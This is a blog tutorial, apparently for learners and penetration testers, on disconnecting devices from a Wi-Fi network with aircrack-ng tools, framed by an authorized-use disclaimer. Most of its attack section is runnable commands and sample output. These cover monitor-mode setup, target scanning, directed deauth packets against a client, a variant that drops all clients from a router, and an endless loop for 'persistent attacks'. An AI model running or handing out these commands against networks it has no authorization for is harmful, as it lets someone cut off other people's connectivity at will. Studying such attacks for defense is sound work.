🚫 Hack the Wi-Fi, Not the Law: How to Disconnect Devices Using Aireplay-ng


Disclaimer: This guide is intended for educational and authorized penetration testing purposes only. Do not use these techniques on networks or devices you do not own or have explicit permission to test. Unauthorized use may be illegal and unethical.
Overview
In this guide, we will learn how to temporarily disconnect a specific device (like your phone or tablet) from a Wi-Fi network using a deauthentication (deauth) attack. This is a common part of wireless penetration testing.
We'll use the aircrack-ng suite, which includes tools like:
airmon-ng
to enable monitor modeairodump-ng
to scan Wi-Fi networks and devicesaireplay-ng
to send deauth packets
Requirements
A computer running Linux (e.g., Kali Linux or Ubuntu)
A wireless adapter that supports monitor mode and packet injection
Aircrack-ng suite installed
How to Check If Your Wi-Fi Card Supports Monitor Mode
Before beginning, it's essential to check if your wireless card supports monitor mode.
Step 1: Identify your wireless card
iwconfig
Look for your Wi-Fi interface (e.g., wlan0
).
Step 2: Check capabilities with iw
sudo iw list | grep -A 10 'Supported interface modes'
You should see something like:
Supported interface modes:
* IBSS
* managed
* AP
* monitor
If monitor
is listed — you're good to go!
Step-by-Step Process
Step 1: Kill Interfering Processes and Start Monitor Mode
Run these commands in a terminal:
sudo airmon-ng check kill
sudo airmon-ng start wlan0
This disables services like
wpa_supplicant
that interfere with monitor mode.Monitor mode will be enabled on a new interface, usually
wlan0mon
.
Output Example:
Killing these processes:
PID Name
15776 wpa_supplicant
Interface Driver Chipset
wlan0 iwlwifi Intel Corporation Comet Lake PCH CNVi WiFi
Step 2: Scan for Nearby Wi-Fi Networks
sudo airodump-ng wlan0mon
This scans all available Wi-Fi networks and clients.
Look for:
BSSID (MAC of router)
CH (channel number)
STATION (MAC of connected devices)
Example target:
BSSID:
40:48:6E:17:DA:79
(Wi-Fi router)STATION:
1E:B3:52:A9:40:0E
(your tablet)Channel:
6
Press Ctrl+C
to stop once you’ve found your target.
Step 3: Focus on Targeted Network
sudo airodump-ng -c 6 --bssid 40:48:6E:17:DA:79 -w capture wlan0mon
-c 6
: Lock to channel 6--bssid
: Filter only the target router-w capture
: Save captured data to a file (optional)
Keep this running in the background to continue monitoring the target.
Step 4: Deauth the Target Device
In a new terminal window, run:
sudo aireplay-ng --deauth 100 -a 40:48:6E:17:DA:79 -c 1E:B3:52:A9:40:0E wlan0mon
--deauth 100
: Send 100 deauthentication packets-a
: Target BSSID (router)-c
: Client MAC (tablet)wlan0mon
: Interface in monitor mode
Sample output:
Sending 64 directed DeAuth (code 7). STMAC: [1E:B3:52:A9:40:0E] [52|442 ACKs]
TIP: If the device reconnects fast, increase the number or loop the command.
To disconnect all clients from the router:
sudo aireplay-ng --deauth 1000 -a 40:48:6E:17:DA:79 wlan0mon
Step 5: Restore Network Services
After you're done:
sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart
This will:
Disable monitor mode
Restart normal Wi-Fi connectivity
Summary of Commands
# Check monitor mode support
sudo iw list | grep -A 10 'Supported interface modes'
# Start monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Scan and attack
sudo airodump-ng wlan0mon
sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon
sudo aireplay-ng --deauth 100 -a <BSSID> -c <Client MAC> wlan0mon
# Restore normal mode
sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart
Why This Works
Deauthentication is a management frame in Wi-Fi.
These frames aren't encrypted, so anyone can spoof and send them.
Devices receiving a deauth packet will disconnect temporarily, and most will try to reconnect.
Troubleshooting
No devices disconnecting? Your adapter may not support injection properly.
Low signal strength? Move closer to the target.
Not seeing STATION MACs? Try generating traffic on the target device (e.g., open a video).
Using 5GHz? Ensure your adapter supports 5GHz.
Additional Ideas
Use
Wireshark
to view captured traffic in real time.Try
aireplay-ng
with loop for persistent attacks:
while true; do sudo aireplay-ng --deauth 50 -a <BSSID> -c <Client MAC> wlan0mon; sleep 1; done
Final Notes
This guide shows how Wi-Fi deauth attacks work at a basic level. Use it to understand vulnerabilities, test defenses, and learn ethical hacking — never for malicious purposes.
Stay curious, stay ethical, and always test responsibly ✨
Subscribe to my newsletter
Read articles from Taha Iftikhar directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
